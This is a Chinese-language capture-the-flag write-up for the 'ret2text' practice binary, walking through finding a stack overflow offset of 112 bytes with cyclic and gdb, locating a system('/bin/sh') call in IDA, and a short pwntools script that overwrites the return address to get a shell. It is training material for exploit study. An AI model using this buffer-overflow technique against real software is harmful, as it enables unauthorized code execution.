https://pan.baidu.com/s/1qy5cyX-RJDyl3wxOXypHtA
dx5d
- 输入【./ret2text】运行程序,发现让你输入,那么我们先随便输入个【123456】,程序结束了。
- 用ida打开这个程序,发现有‘system’函数,还可以输入,那么就可以利用栈溢出获取系统权限。
-
首先先多输入点,看看什么时候溢出,这里用cyclic有序字符串。
-
输入【cyclic 200】生成200个有序字符。
-
用gdb打开ret2text,输入【gdb ret2text】。
-
输入【run】运行程序,程序让我们输入,则把刚生成的200个有序字符串输入,发现报错,那么就是溢出了。
-
观察可知溢出的地方是‘0x62616164’。
-
那么怎么知道到底有多少个数字溢出了呢?
-
看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢,就是我们200个有序字符其中最先溢出的第部分。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。根据ASCII码表,又根据‘0x’是16进制的意思,可以查表得出这串数字转换成字母是‘baad’。接下来就要知道cyclic的顺序了,稍微观察一下就可以知道cyclic的规则(4个数4个数有规则),轻易的就可以数出它的位置。
-
当然还有更简单的方法,前文也说了cyclic是有序字符串,自然有一个子函数可以查,“cyclic -l”代表着查询你所给的4bit字符前有几个字母。
-
输入【cyclic -l 0x62616164】,得到112,说明‘baad’前有112个字母,那么这112个字母就是填充空栈的所需量了。接下来多的就会溢出。
-
那么我们就要把我们要他跳转的位置放在112个字母后让他溢出,就可以实现跳转。
-
在ida里找到system函数,但是点进去所显示的语句所在的行数,不是system函数真正的行数,而是引用system函数的语句所在的行数。
-
看到system和↑或者↓在同一行,点击↑或者↓,点了几次点不了了,就找到了system函数真正的位置。
- 发现system函数的值是‘/bin/sh’,运行这个system函数加这个值就可以获得系统权限。
- 记录下所要跳转到的这一行,写脚本,将其放在112个填充物的后面。
from pwn import *sh=process('./ret2text')
elf=ELF('./ret2text')
target=0x0804863A
#即/bin/sh所在位置
sh.sendline('a'*112+p32(target))
#至此就获得了系统权限
sh.interactive()
#打开交互页面
退出gdb,输入【python exp.py ret2text】让程序运行我们的脚本。
终于,我们获得了系统权限。